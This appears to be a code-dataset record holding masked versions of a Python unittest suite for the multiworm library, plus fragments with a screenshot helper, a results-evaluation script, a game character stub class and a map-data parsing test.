"index": 6238,
"step-1": "<mask token>\n\n\nclass TestExperimentOpen(unittest.TestCase):\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n\n\nclass TestMalformedExperiments(unittest.TestCase):\n\n def test_nonexistent_folder(self):\n try:\n ex = multiworm.Experiment(DATA_DIR /\n 'guaranteedtohopefullynotbethere')\n except multiworm.core.MWTDataError:\n self.fail('Overly specific error raised')\n except IOError as e:\n self.assertIn('exist', str(e))\n else:\n self.fail(\"Didn't even mention the folder isn't there\")\n\n def test_check_is_dir(self):\n try:\n ex = multiworm.Experiment(SYNTH1 / 'test_blobsfile.png')\n except multiworm.core.MWTDataError:\n self.fail('Overly specific error raised')\n except IOError as e:\n self.assertIn('directory', str(e))\n else:\n self.fail(\"Didn't even mention the folder isn't there\")\n\n def test_missing_summary(self):\n try:\n ex = multiworm.Experiment(DATA_DIR / 'bad_empty')\n except multiworm.core.MWTDataError as e:\n pass\n else:\n self.fail(\"Didn't raise error despite no summary file\")\n\n def test_dupe_summary(self):\n try:\n ex = multiworm.Experiment(DATA_DIR / 'bad_twosummary')\n except multiworm.core.MWTSummaryError as e:\n pass\n else:\n self.fail(\"Didn't raise error with ambiguous summary file\")\n\n\nclass TestMalformedData(unittest.TestCase):\n\n def test_zero_frame(self):\n try:\n ex = multiworm.Experiment(DATA_DIR / 'bad_framezero')\n except multiworm.core.MWTDataError:\n pass\n else:\n self.fail(\"Didn't raise error on malformed data with a frame 0\")\n\n\nclass TestReadingData(unittest.TestCase):\n\n def setUp(self):\n self.ex = multiworm.Experiment(SYNTH1)\n\n def test_length_is_num_blobs(self):\n self.assertEqual(SYNTH1_N_BLOBS, len(self.ex))\n\n def test_iter(self):\n count = 0\n for thing in self.ex:\n count += 1\n self.assertEqual(SYNTH1_N_BLOBS, count)\n\n def test_iter_blobs(self):\n count = 0\n for thing in self.ex.blobs():\n count += 1\n self.assertEqual(SYNTH1_N_BLOBS, count)\n\n\nclass TestExperimentProperties(unittest.TestCase):\n\n def setUp(self):\n self.ex = multiworm.Experiment(SYNTH1)\n\n def test_blobs_in_frame(self):\n self.assertEquals(list(self.ex.blobs_in_frame(10)), list(range(1, 12)))\n self.assertEquals(list(self.ex.blobs_in_frame(200)), list(range(5, 12))\n )\n\n def test_locked_graph(self):\n try:\n self.ex.graph.add_node(123)\n except nx.NetworkXError as e:\n self.assertIn('frozen', str(e).lower())\n else:\n self.fail('experiment graph should be frozen/locked')\n\n def test_graph_copy_unlocked(self):\n G = self.ex.graph.copy()\n G.add_node(123)\n G.add_edge(55, 66)\n",
"step-2": "<mask token>\n\n\nclass TestExperimentOpen(unittest.TestCase):\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n\n def test_callback(self):\n\n\n class StateThing(object):\n\n def __init__(self):\n self.progress = -1\n\n def __call__(self, progress):\n assert progress >= self.progress\n self.progress = progress\n ex = multiworm.Experiment(SYNTH1, callback=StateThing())\n\n\nclass TestMalformedExperiments(unittest.TestCase):\n\n def test_nonexistent_folder(self):\n try:\n ex = multiworm.Experiment(DATA_DIR /\n 'guaranteedtohopefullynotbethere')\n except multiworm.core.MWTDataError:\n self.fail('Overly specific error raised')\n except IOError as e:\n self.assertIn('exist', str(e))\n else:\n self.fail(\"Didn't even mention the folder isn't there\")\n\n def test_check_is_dir(self):\n try:\n ex = multiworm.Experiment(SYNTH1 / 'test_blobsfile.png')\n except multiworm.core.MWTDataError:\n self.fail('Overly specific error raised')\n except IOError as e:\n self.assertIn('directory', str(e))\n else:\n self.fail(\"Didn't even mention the folder isn't there\")\n\n def test_missing_summary(self):\n try:\n ex = multiworm.Experiment(DATA_DIR / 'bad_empty')\n except multiworm.core.MWTDataError as e:\n pass\n else:\n self.fail(\"Didn't raise error despite no summary file\")\n\n def test_dupe_summary(self):\n try:\n ex = multiworm.Experiment(DATA_DIR / 'bad_twosummary')\n except multiworm.core.MWTSummaryError as e:\n pass\n else:\n self.fail(\"Didn't raise error with ambiguous summary file\")\n\n\nclass TestMalformedData(unittest.TestCase):\n\n def test_zero_frame(self):\n try:\n ex = multiworm.Experiment(DATA_DIR / 'bad_framezero')\n except multiworm.core.MWTDataError:\n pass\n else:\n self.fail(\"Didn't raise error on malformed data with a frame 0\")\n\n\nclass TestReadingData(unittest.TestCase):\n\n def setUp(self):\n self.ex = multiworm.Experiment(SYNTH1)\n\n def test_length_is_num_blobs(self):\n self.assertEqual(SYNTH1_N_BLOBS, len(self.ex))\n\n def test_iter(self):\n count = 0\n for thing in self.ex:\n count += 1\n self.assertEqual(SYNTH1_N_BLOBS, count)\n\n def test_iter_blobs(self):\n count = 0\n for thing in self.ex.blobs():\n count += 1\n self.assertEqual(SYNTH1_N_BLOBS, count)\n\n\nclass TestExperimentProperties(unittest.TestCase):\n\n def setUp(self):\n self.ex = multiworm.Experiment(SYNTH1)\n\n def test_blobs_in_frame(self):\n self.assertEquals(list(self.ex.blobs_in_frame(10)), list(range(1, 12)))\n self.assertEquals(list(self.ex.blobs_in_frame(200)), list(range(5, 12))\n )\n\n def test_locked_graph(self):\n try:\n self.ex.graph.add_node(123)\n except nx.NetworkXError as e:\n self.assertIn('frozen', str(e).lower())\n else:\n self.fail('experiment graph should be frozen/locked')\n\n def test_graph_copy_unlocked(self):\n G = self.ex.graph.copy()\n G.add_node(123)\n G.add_edge(55, 66)\n",
"step-3": "<mask token>\n\n\nclass TestExperimentOpen(unittest.TestCase):\n\n def test_pathlib(self):\n ex = multiworm.Experiment(SYNTH1)\n <mask token>\n <mask token>\n\n def test_strroot_and_id(self):\n ex = multiworm.Experiment(data_root=str(DATA_DIR), experiment_id=\n 'synth1')\n\n def test_empty_fail(self):\n try:\n multiworm.Experiment()\n except Exception as e:\n if not isinstance(e, ValueError):\n self.fail('raised some unexpected error')\n if not all(x in str(e) for x in ['experiment_id', 'must',\n 'provided']):\n self.fail('error message unexpected')\n else:\n self.fail('experiment constructor worked with no arguments')\n\n def test_dataroot_only_fail(self):\n try:\n multiworm.Experiment(data_root=DATA_DIR)\n except Exception as e:\n if not isinstance(e, ValueError):\n self.fail('raised some unexpected error')\n if not all(x in str(e) for x in ['experiment_id', 'must',\n 'provided']):\n self.fail('error message unexpected')\n else:\n self.fail(\n 'experiment constructor allowed data-root only without erroring'\n )\n\n def test_custom_id(self):\n my_id = 'peterspeppers'\n ex = multiworm.Experiment(fullpath=SYNTH1, experiment_id=my_id)\n self.assertEquals(ex.id, my_id)\n\n def test_callback(self):\n\n\n class StateThing(object):\n\n def __init__(self):\n self.progress = -1\n\n def __call__(self, progress):\n assert progress >= self.progress\n self.progress = progress\n ex = multiworm.Experiment(SYNTH1, callback=StateThing())\n\n\nclass TestMalformedExperiments(unittest.TestCase):\n\n def test_nonexistent_folder(self):\n try:\n ex = multiworm.Experiment(DATA_DIR /\n 'guaranteedtohopefullynotbethere')\n except multiworm.core.MWTDataError:\n self.fail('Overly specific error raised')\n except IOError as e:\n self.assertIn('exist', str(e))\n else:\n self.fail(\"Didn't even mention the folder isn't there\")\n\n def test_check_is_dir(self):\n try:\n ex = multiworm.Experiment(SYNTH1 / 'test_blobsfile.png')\n except multiworm.core.MWTDataError:\n self.fail('Overly specific error raised')\n except IOError as e:\n self.assertIn('directory', str(e))\n else:\n self.fail(\"Didn't even mention the folder isn't there\")\n\n def test_missing_summary(self):\n try:\n ex = multiworm.Experiment(DATA_DIR / 'bad_empty')\n except multiworm.core.MWTDataError as e:\n pass\n else:\n self.fail(\"Didn't raise error despite no summary file\")\n\n def test_dupe_summary(self):\n try:\n ex = multiworm.Experiment(DATA_DIR / 'bad_twosummary')\n except multiworm.core.MWTSummaryError as e:\n pass\n else:\n self.fail(\"Didn't raise error with ambiguous summary file\")\n\n\nclass TestMalformedData(unittest.TestCase):\n\n def test_zero_frame(self):\n try:\n ex = multiworm.Experiment(DATA_DIR / 'bad_framezero')\n except multiworm.core.MWTDataError:\n pass\n else:\n self.fail(\"Didn't raise error on malformed data with a frame 0\")\n\n\nclass TestReadingData(unittest.TestCase):\n\n def setUp(self):\n self.ex = multiworm.Experiment(SYNTH1)\n\n def test_length_is_num_blobs(self):\n self.assertEqual(SYNTH1_N_BLOBS, len(self.ex))\n\n def test_iter(self):\n count = 0\n for thing in self.ex:\n count += 1\n self.assertEqual(SYNTH1_N_BLOBS, count)\n\n def test_iter_blobs(self):\n count = 0\n for thing in self.ex.blobs():\n count += 1\n self.assertEqual(SYNTH1_N_BLOBS, count)\n\n\nclass TestExperimentProperties(unittest.TestCase):\n\n def setUp(self):\n self.ex = multiworm.Experiment(SYNTH1)\n\n def test_blobs_in_frame(self):\n self.assertEquals(list(self.ex.blobs_in_frame(10)), list(range(1, 12)))\n self.assertEquals(list(self.ex.blobs_in_frame(200)), list(range(5, 12))\n )\n\n def test_locked_graph(self):\n try:\n self.ex.graph.add_node(123)\n except nx.NetworkXError as e:\n self.assertIn('frozen', str(e).lower())\n else:\n self.fail('experiment graph should be frozen/locked')\n\n def test_graph_copy_unlocked(self):\n G = self.ex.graph.copy()\n G.add_node(123)\n G.add_edge(55, 66)\n",
"step-4": "<mask token>\nTEST_ROOT = pathlib.Path(__file__).parent.resolve()\nDATA_DIR = TEST_ROOT / 'data'\nSYNTH1 = DATA_DIR / 'synth1'\nSYNTH1_N_BLOBS = 12\n\n\nclass TestExperimentOpen(unittest.TestCase):\n\n def test_pathlib(self):\n ex = multiworm.Experiment(SYNTH1)\n\n def test_strpath(self):\n ex = multiworm.Experiment(str(SYNTH1))\n\n def test_root_and_id(self):\n ex = multiworm.Experiment(data_root=DATA_DIR, experiment_id='synth1')\n\n def test_strroot_and_id(self):\n ex = multiworm.Experiment(data_root=str(DATA_DIR), experiment_id=\n 'synth1')\n\n def test_empty_fail(self):\n try:\n multiworm.Experiment()\n except Exception as e:\n if not isinstance(e, ValueError):\n self.fail('raised some unexpected error')\n if not all(x in str(e) for x in ['experiment_id', 'must',\n 'provided']):\n self.fail('error message unexpected')\n else:\n self.fail('experiment constructor worked with no arguments')\n\n def test_dataroot_only_fail(self):\n try:\n multiworm.Experiment(data_root=DATA_DIR)\n except Exception as e:\n if not isinstance(e, ValueError):\n self.fail('raised some unexpected error')\n if not all(x in str(e) for x in ['experiment_id', 'must',\n 'provided']):\n self.fail('error message unexpected')\n else:\n self.fail(\n 'experiment constructor allowed data-root only without erroring'\n )\n\n def test_custom_id(self):\n my_id = 'peterspeppers'\n ex = multiworm.Experiment(fullpath=SYNTH1, experiment_id=my_id)\n self.assertEquals(ex.id, my_id)\n\n def test_callback(self):\n\n\n class StateThing(object):\n\n def __init__(self):\n self.progress = -1\n\n def __call__(self, progress):\n assert progress >= self.progress\n self.progress = progress\n ex = multiworm.Experiment(SYNTH1, callback=StateThing())\n\n\nclass TestMalformedExperiments(unittest.TestCase):\n\n def test_nonexistent_folder(self):\n try:\n ex = multiworm.Experiment(DATA_DIR /\n 'guaranteedtohopefullynotbethere')\n except multiworm.core.MWTDataError:\n self.fail('Overly specific error raised')\n except IOError as e:\n self.assertIn('exist', str(e))\n else:\n self.fail(\"Didn't even mention the folder isn't there\")\n\n def test_check_is_dir(self):\n try:\n ex = multiworm.Experiment(SYNTH1 / 'test_blobsfile.png')\n except multiworm.core.MWTDataError:\n self.fail('Overly specific error raised')\n except IOError as e:\n self.assertIn('directory', str(e))\n else:\n self.fail(\"Didn't even mention the folder isn't there\")\n\n def test_missing_summary(self):\n try:\n ex = multiworm.Experiment(DATA_DIR / 'bad_empty')\n except multiworm.core.MWTDataError as e:\n pass\n else:\n self.fail(\"Didn't raise error despite no summary file\")\n\n def test_dupe_summary(self):\n try:\n ex = multiworm.Experiment(DATA_DIR / 'bad_twosummary')\n except multiworm.core.MWTSummaryError as e:\n pass\n else:\n self.fail(\"Didn't raise error with ambiguous summary file\")\n\n\nclass TestMalformedData(unittest.TestCase):\n\n def test_zero_frame(self):\n try:\n ex = multiworm.Experiment(DATA_DIR / 'bad_framezero')\n except multiworm.core.MWTDataError:\n pass\n else:\n self.fail(\"Didn't raise error on malformed data with a frame 0\")\n\n\nclass TestReadingData(unittest.TestCase):\n\n def setUp(self):\n self.ex = multiworm.Experiment(SYNTH1)\n\n def test_length_is_num_blobs(self):\n self.assertEqual(SYNTH1_N_BLOBS, len(self.ex))\n\n def test_iter(self):\n count = 0\n for thing in self.ex:\n count += 1\n self.assertEqual(SYNTH1_N_BLOBS, count)\n\n def test_iter_blobs(self):\n count = 0\n for thing in self.ex.blobs():\n count += 1\n self.assertEqual(SYNTH1_N_BLOBS, count)\n\n\nclass TestExperimentProperties(unittest.TestCase):\n\n def setUp(self):\n self.ex = multiworm.Experiment(SYNTH1)\n\n def test_blobs_in_frame(self):\n self.assertEquals(list(self.ex.blobs_in_frame(10)), list(range(1, 12)))\n self.assertEquals(list(self.ex.blobs_in_frame(200)), list(range(5, 12))\n )\n\n def test_locked_graph(self):\n try:\n self.ex.graph.add_node(123)\n except nx.NetworkXError as e:\n self.assertIn('frozen', str(e).lower())\n else:\n self.fail('experiment graph should be frozen/locked')\n\n def test_graph_copy_unlocked(self):\n G = self.ex.graph.copy()\n G.add_node(123)\n G.add_edge(55, 66)\n",
"step-5": "from __future__ import absolute_import, print_function, unicode_literals\nimport six\nfrom six.moves import zip, filter, map, reduce, input, range\n\nimport pathlib\nimport unittest\n\nimport networkx as nx\n\nimport multiworm\n\n\nTEST_ROOT = pathlib.Path(__file__).parent.resolve()\nDATA_DIR = TEST_ROOT / 'data'\nSYNTH1 = DATA_DIR / 'synth1'\n\nSYNTH1_N_BLOBS = 12\n\n\nclass TestExperimentOpen(unittest.TestCase):\n\n def test_pathlib(self):\n ex = multiworm.Experiment(SYNTH1)\n\n def test_strpath(self):\n ex = multiworm.Experiment(str(SYNTH1))\n\n def test_root_and_id(self):\n ex = multiworm.Experiment(\n data_root=DATA_DIR,\n experiment_id='synth1',\n )\n\n def test_strroot_and_id(self):\n ex = multiworm.Experiment(\n data_root=str(DATA_DIR),\n experiment_id='synth1',\n )\n\n def test_empty_fail(self):\n try:\n multiworm.Experiment()\n except Exception as e:\n if not isinstance(e, ValueError):\n self.fail('raised some unexpected error')\n if not all(x in str(e) for x in ['experiment_id', 'must', 'provided']):\n self.fail('error message unexpected')\n else:\n self.fail('experiment constructor worked with no arguments')\n\n def test_dataroot_only_fail(self):\n try:\n multiworm.Experiment(data_root=DATA_DIR)\n except Exception as e:\n if not isinstance(e, ValueError):\n self.fail('raised some unexpected error')\n if not all(x in str(e) for x in ['experiment_id', 'must', 'provided']):\n self.fail('error message unexpected')\n else:\n self.fail('experiment constructor allowed data-root only without erroring')\n\n def test_custom_id(self):\n my_id = 'peterspeppers'\n ex = multiworm.Experiment(fullpath=SYNTH1, experiment_id=my_id)\n self.assertEquals(ex.id, my_id)\n\n def test_callback(self):\n class StateThing(object):\n def __init__(self):\n self.progress = -1\n\n def __call__(self, progress):\n assert progress >= self.progress\n self.progress = progress\n\n ex = multiworm.Experiment(SYNTH1, callback=StateThing())\n\n\nclass TestMalformedExperiments(unittest.TestCase):\n\n def test_nonexistent_folder(self):\n try:\n ex = multiworm.Experiment(DATA_DIR / 'guaranteedtohopefullynotbethere')\n except multiworm.core.MWTDataError:\n self.fail('Overly specific error raised')\n except IOError as e:\n self.assertIn('exist', str(e))\n else:\n self.fail(\"Didn't even mention the folder isn't there\")\n\n def test_check_is_dir(self):\n try:\n ex = multiworm.Experiment(SYNTH1 / 'test_blobsfile.png')\n except multiworm.core.MWTDataError:\n self.fail('Overly specific error raised')\n except IOError as e:\n self.assertIn('directory', str(e))\n else:\n self.fail(\"Didn't even mention the folder isn't there\")\n\n def test_missing_summary(self):\n try:\n ex = multiworm.Experiment(DATA_DIR / 'bad_empty')\n except multiworm.core.MWTDataError as e:\n pass\n else:\n self.fail(\"Didn't raise error despite no summary file\")\n\n def test_dupe_summary(self):\n try:\n ex = multiworm.Experiment(DATA_DIR / 'bad_twosummary')\n except multiworm.core.MWTSummaryError as e:\n pass\n else:\n self.fail(\"Didn't raise error with ambiguous summary file\")\n\n\nclass TestMalformedData(unittest.TestCase):\n\n def test_zero_frame(self):\n try:\n ex = multiworm.Experiment(DATA_DIR / 'bad_framezero')\n except multiworm.core.MWTDataError:\n pass\n else:\n self.fail(\"Didn't raise error on malformed data with a frame 0\")\n\n\nclass TestReadingData(unittest.TestCase):\n\n def setUp(self):\n self.ex = multiworm.Experiment(SYNTH1)\n\n def test_length_is_num_blobs(self):\n self.assertEqual(SYNTH1_N_BLOBS, len(self.ex))\n\n def test_iter(self):\n count = 0\n for thing in self.ex:\n count += 1\n self.assertEqual(SYNTH1_N_BLOBS, count)\n\n def test_iter_blobs(self):\n count = 0\n for thing in self.ex.blobs():\n count += 1\n self.assertEqual(SYNTH1_N_BLOBS, count)\n\n\nclass TestExperimentProperties(unittest.TestCase):\n\n def setUp(self):\n self.ex = multiworm.Experiment(SYNTH1)\n\n def test_blobs_in_frame(self):\n self.assertEquals(list(self.ex.blobs_in_frame(10)), list(range(1, 12)))\n self.assertEquals(list(self.ex.blobs_in_frame(200)), list(range(5, 12)))\n\n def test_locked_graph(self):\n try:\n self.ex.graph.add_node(123)\n except nx.NetworkXError as e:\n self.assertIn('frozen', str(e).lower())\n else:\n self.fail('experiment graph should be frozen/locked')\n\n def test_graph_copy_unlocked(self):\n G = self.ex.graph.copy()\n G.add_node(123)\n G.add_edge(55, 66)\n",
"step-ids": [
18,
19,
24,
27,
29
]
}
|
[
18,
19,
24,
27,
29
] |
import os
def take_shot(filename):
os.system("screencapture "+filename+".png")
|
normal
|
{
"blob_id": "f4c90a6d6afdcf78ec6742b1924a5c854a5a4ed6",
"index": 1825,
"step-1": "<mask token>\n",
"step-2": "<mask token>\n\n\ndef take_shot(filename):\n os.system('screencapture ' + filename + '.png')\n",
"step-3": "import os\n\n\ndef take_shot(filename):\n os.system('screencapture ' + filename + '.png')\n",
"step-4": "import os\n\ndef take_shot(filename):\n os.system(\"screencapture \"+filename+\".png\")\n",
"step-5": null,
"step-ids": [
0,
1,
2,
3
]
}
|
[
0,
1,
2,
3
] |
import os
from typing import Union, Tuple, List
import pandas as pd
from flags import FLAGS
from helpers import load_from_pickle, decode_class, sort_results_by_metric
ROOT = FLAGS.ROOT
RESULTS_FOLDER = FLAGS.RESULTS_FOLDER
FULL_PATH_TO_CHECKPOINTS = os.path.join(ROOT, RESULTS_FOLDER, "checkpoints")
def eval_results(time_stamps: Union[Tuple, List],
excel_file_path=os.path.join(FULL_PATH_TO_CHECKPOINTS, f"xVal_results.xlsx")):
with pd.ExcelWriter(excel_file_path, mode="w") as writer:
for ts in time_stamps:
print(f"Evaluating results for time stamp: {ts}")
full_results_dict_path = os.path.join(FULL_PATH_TO_CHECKPOINTS, f"full_result_dict_{ts}.p")
full_results_dict = load_from_pickle(full_results_dict_path)
for run_id, results_dict in full_results_dict.items():
only_eval_dict = {cur_xval: [decode_class(data[3]) for data in data_list]
for cur_xval, data_list in results_dict.items()}
# convert to pandas dataframe
df = pd.DataFrame(only_eval_dict)
df.to_csv(os.path.join(FULL_PATH_TO_CHECKPOINTS, f"xVal_results_{run_id}.csv"), index=False, header=False)
df.to_excel(writer, run_id)
if __name__ == '__main__':
time_stamps_to_eval = ["1616007514.9154973"]
eval_results(time_stamps_to_eval)
metric = "f1score"
score_path_list, _ = sort_results_by_metric(os.path.join(ROOT, RESULTS_FOLDER, "checkpoints"), metric)
print(f"{metric}: {[s for s, p in score_path_list]}")
|
normal
|
{
"blob_id": "5447bd3b08c22913ae50ee66ee81554d2357ef3e",
"index": 3991,
"step-1": "<mask token>\n\n\ndef eval_results(time_stamps: Union[Tuple, List], excel_file_path=os.path.\n join(FULL_PATH_TO_CHECKPOINTS, f'xVal_results.xlsx')):\n with pd.ExcelWriter(excel_file_path, mode='w') as writer:\n for ts in time_stamps:\n print(f'Evaluating results for time stamp: {ts}')\n full_results_dict_path = os.path.join(FULL_PATH_TO_CHECKPOINTS,\n f'full_result_dict_{ts}.p')\n full_results_dict = load_from_pickle(full_results_dict_path)\n for run_id, results_dict in full_results_dict.items():\n only_eval_dict = {cur_xval: [decode_class(data[3]) for data in\n data_list] for cur_xval, data_list in results_dict.items()}\n df = pd.DataFrame(only_eval_dict)\n df.to_csv(os.path.join(FULL_PATH_TO_CHECKPOINTS,\n f'xVal_results_{run_id}.csv'), index=False, header=False)\n df.to_excel(writer, run_id)\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\ndef eval_results(time_stamps: Union[Tuple, List], excel_file_path=os.path.\n join(FULL_PATH_TO_CHECKPOINTS, f'xVal_results.xlsx')):\n with pd.ExcelWriter(excel_file_path, mode='w') as writer:\n for ts in time_stamps:\n print(f'Evaluating results for time stamp: {ts}')\n full_results_dict_path = os.path.join(FULL_PATH_TO_CHECKPOINTS,\n f'full_result_dict_{ts}.p')\n full_results_dict = load_from_pickle(full_results_dict_path)\n for run_id, results_dict in full_results_dict.items():\n only_eval_dict = {cur_xval: [decode_class(data[3]) for data in\n data_list] for cur_xval, data_list in results_dict.items()}\n df = pd.DataFrame(only_eval_dict)\n df.to_csv(os.path.join(FULL_PATH_TO_CHECKPOINTS,\n f'xVal_results_{run_id}.csv'), index=False, header=False)\n df.to_excel(writer, run_id)\n\n\nif __name__ == '__main__':\n time_stamps_to_eval = ['1616007514.9154973']\n eval_results(time_stamps_to_eval)\n metric = 'f1score'\n score_path_list, _ = sort_results_by_metric(os.path.join(ROOT,\n RESULTS_FOLDER, 'checkpoints'), metric)\n print(f'{metric}: {[s for s, p in score_path_list]}')\n",
"step-3": "<mask token>\nROOT = FLAGS.ROOT\nRESULTS_FOLDER = FLAGS.RESULTS_FOLDER\nFULL_PATH_TO_CHECKPOINTS = os.path.join(ROOT, RESULTS_FOLDER, 'checkpoints')\n\n\ndef eval_results(time_stamps: Union[Tuple, List], excel_file_path=os.path.\n join(FULL_PATH_TO_CHECKPOINTS, f'xVal_results.xlsx')):\n with pd.ExcelWriter(excel_file_path, mode='w') as writer:\n for ts in time_stamps:\n print(f'Evaluating results for time stamp: {ts}')\n full_results_dict_path = os.path.join(FULL_PATH_TO_CHECKPOINTS,\n f'full_result_dict_{ts}.p')\n full_results_dict = load_from_pickle(full_results_dict_path)\n for run_id, results_dict in full_results_dict.items():\n only_eval_dict = {cur_xval: [decode_class(data[3]) for data in\n data_list] for cur_xval, data_list in results_dict.items()}\n df = pd.DataFrame(only_eval_dict)\n df.to_csv(os.path.join(FULL_PATH_TO_CHECKPOINTS,\n f'xVal_results_{run_id}.csv'), index=False, header=False)\n df.to_excel(writer, run_id)\n\n\nif __name__ == '__main__':\n time_stamps_to_eval = ['1616007514.9154973']\n eval_results(time_stamps_to_eval)\n metric = 'f1score'\n score_path_list, _ = sort_results_by_metric(os.path.join(ROOT,\n RESULTS_FOLDER, 'checkpoints'), metric)\n print(f'{metric}: {[s for s, p in score_path_list]}')\n",
"step-4": "import os\nfrom typing import Union, Tuple, List\nimport pandas as pd\nfrom flags import FLAGS\nfrom helpers import load_from_pickle, decode_class, sort_results_by_metric\nROOT = FLAGS.ROOT\nRESULTS_FOLDER = FLAGS.RESULTS_FOLDER\nFULL_PATH_TO_CHECKPOINTS = os.path.join(ROOT, RESULTS_FOLDER, 'checkpoints')\n\n\ndef eval_results(time_stamps: Union[Tuple, List], excel_file_path=os.path.\n join(FULL_PATH_TO_CHECKPOINTS, f'xVal_results.xlsx')):\n with pd.ExcelWriter(excel_file_path, mode='w') as writer:\n for ts in time_stamps:\n print(f'Evaluating results for time stamp: {ts}')\n full_results_dict_path = os.path.join(FULL_PATH_TO_CHECKPOINTS,\n f'full_result_dict_{ts}.p')\n full_results_dict = load_from_pickle(full_results_dict_path)\n for run_id, results_dict in full_results_dict.items():\n only_eval_dict = {cur_xval: [decode_class(data[3]) for data in\n data_list] for cur_xval, data_list in results_dict.items()}\n df = pd.DataFrame(only_eval_dict)\n df.to_csv(os.path.join(FULL_PATH_TO_CHECKPOINTS,\n f'xVal_results_{run_id}.csv'), index=False, header=False)\n df.to_excel(writer, run_id)\n\n\nif __name__ == '__main__':\n time_stamps_to_eval = ['1616007514.9154973']\n eval_results(time_stamps_to_eval)\n metric = 'f1score'\n score_path_list, _ = sort_results_by_metric(os.path.join(ROOT,\n RESULTS_FOLDER, 'checkpoints'), metric)\n print(f'{metric}: {[s for s, p in score_path_list]}')\n",
"step-5": "import os\nfrom typing import Union, Tuple, List\n\nimport pandas as pd\n\nfrom flags import FLAGS\nfrom helpers import load_from_pickle, decode_class, sort_results_by_metric\n\nROOT = FLAGS.ROOT\nRESULTS_FOLDER = FLAGS.RESULTS_FOLDER\n\nFULL_PATH_TO_CHECKPOINTS = os.path.join(ROOT, RESULTS_FOLDER, \"checkpoints\")\n\n\ndef eval_results(time_stamps: Union[Tuple, List],\n excel_file_path=os.path.join(FULL_PATH_TO_CHECKPOINTS, f\"xVal_results.xlsx\")):\n with pd.ExcelWriter(excel_file_path, mode=\"w\") as writer:\n for ts in time_stamps:\n print(f\"Evaluating results for time stamp: {ts}\")\n full_results_dict_path = os.path.join(FULL_PATH_TO_CHECKPOINTS, f\"full_result_dict_{ts}.p\")\n\n full_results_dict = load_from_pickle(full_results_dict_path)\n\n for run_id, results_dict in full_results_dict.items():\n only_eval_dict = {cur_xval: [decode_class(data[3]) for data in data_list]\n for cur_xval, data_list in results_dict.items()}\n # convert to pandas dataframe\n df = pd.DataFrame(only_eval_dict)\n df.to_csv(os.path.join(FULL_PATH_TO_CHECKPOINTS, f\"xVal_results_{run_id}.csv\"), index=False, header=False)\n df.to_excel(writer, run_id)\n\n\nif __name__ == '__main__':\n time_stamps_to_eval = [\"1616007514.9154973\"]\n eval_results(time_stamps_to_eval)\n\n metric = \"f1score\"\n\n score_path_list, _ = sort_results_by_metric(os.path.join(ROOT, RESULTS_FOLDER, \"checkpoints\"), metric)\n\n print(f\"{metric}: {[s for s, p in score_path_list]}\")\n",
"step-ids": [
1,
2,
3,
4,
5
]
}
|
[
1,
2,
3,
4,
5
] |
__author__ = 'Jager'
from char import Character
class Rouge (Character):
def special_attack1(self, opponent, hitdamage_callback, specatt_callback):
pass # hook method
def special_attack2(self, opponent, hitdamage_callback, specatt_callback):
pass # hook method
def heal(self, target):
pass # hook method
def regen_resource(self):
pass # hook method
def full_resource(self):
pass
|
normal
|
{
"blob_id": "36991c3191ba48b1b9dbd843e279f8fe124f1339",
"index": 73,
"step-1": "<mask token>\n\n\nclass Rouge(Character):\n\n def special_attack1(self, opponent, hitdamage_callback, specatt_callback):\n pass\n\n def special_attack2(self, opponent, hitdamage_callback, specatt_callback):\n pass\n <mask token>\n\n def regen_resource(self):\n pass\n\n def full_resource(self):\n pass\n",
"step-2": "<mask token>\n\n\nclass Rouge(Character):\n\n def special_attack1(self, opponent, hitdamage_callback, specatt_callback):\n pass\n\n def special_attack2(self, opponent, hitdamage_callback, specatt_callback):\n pass\n\n def heal(self, target):\n pass\n\n def regen_resource(self):\n pass\n\n def full_resource(self):\n pass\n",
"step-3": "__author__ = 'Jager'\n<mask token>\n\n\nclass Rouge(Character):\n\n def special_attack1(self, opponent, hitdamage_callback, specatt_callback):\n pass\n\n def special_attack2(self, opponent, hitdamage_callback, specatt_callback):\n pass\n\n def heal(self, target):\n pass\n\n def regen_resource(self):\n pass\n\n def full_resource(self):\n pass\n",
"step-4": "__author__ = 'Jager'\nfrom char import Character\n\n\nclass Rouge(Character):\n\n def special_attack1(self, opponent, hitdamage_callback, specatt_callback):\n pass\n\n def special_attack2(self, opponent, hitdamage_callback, specatt_callback):\n pass\n\n def heal(self, target):\n pass\n\n def regen_resource(self):\n pass\n\n def full_resource(self):\n pass\n",
"step-5": "__author__ = 'Jager'\nfrom char import Character\n\nclass Rouge (Character):\n\n def special_attack1(self, opponent, hitdamage_callback, specatt_callback):\n pass # hook method\n\n def special_attack2(self, opponent, hitdamage_callback, specatt_callback):\n pass # hook method\n\n def heal(self, target):\n pass # hook method\n\n def regen_resource(self):\n pass # hook method\n\n\n def full_resource(self):\n pass",
"step-ids": [
5,
6,
7,
8,
9
]
}
|
[
5,
6,
7,
8,
9
] |
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def parse_mapdata_test():
current_folder = os.path.dirname(os.path.realpath(__file__))
misc_folder = os.path.join(current_folder, 'misc')
maplistdata_path = os.path.join(misc_folder, 'MapList.dat')
result = copy.parse_mapdata(maplistdata_path)
expected = {'num1': '00010001', 'num2': '00010001', 'regions': {(1): [
'BACK/B0000035.DFT', 'BACK/B0000036.DFT', 'BACK/B0000044.DFT',
'BACK/B0000045.DFT', 'BACK/B0000053.DFT', 'BACK/B0000054.DFT',
'NAME/N0000035.DFT', 'NAME/N0000036.DFT', 'NAME/N0000044.DFT',
'NAME/N0000045.DFT', 'NAME/N0000053.DFT', 'NAME/N0000054.DFT',
'POI/P0000035.DFT', 'POI/P0000036.DFT', 'POI/P0000044.DFT',
'POI/P0000045.DFT', 'POI/P0000053.DFT', 'POI/P0000054.DFT'], (2): [
'BACK/B0000024.DFT', 'BACK/B0000025.DFT', 'BACK/B0000026.DFT',
'BACK/B0000027.DFT', 'BACK/B0000033.DFT', 'BACK/B0000034.DFT',
'BACK/B0000035.DFT', 'BACK/B0000036.DFT', 'BACK/B0000042.DFT',
'BACK/B0000043.DFT', 'BACK/B0000044.DFT', 'BACK/B0000045.DFT',
'NAME/N0000024.DFT', 'NAME/N0000025.DFT', 'NAME/N0000026.DFT',
'NAME/N0000027.DFT', 'NAME/N0000033.DFT', 'NAME/N0000034.DFT',
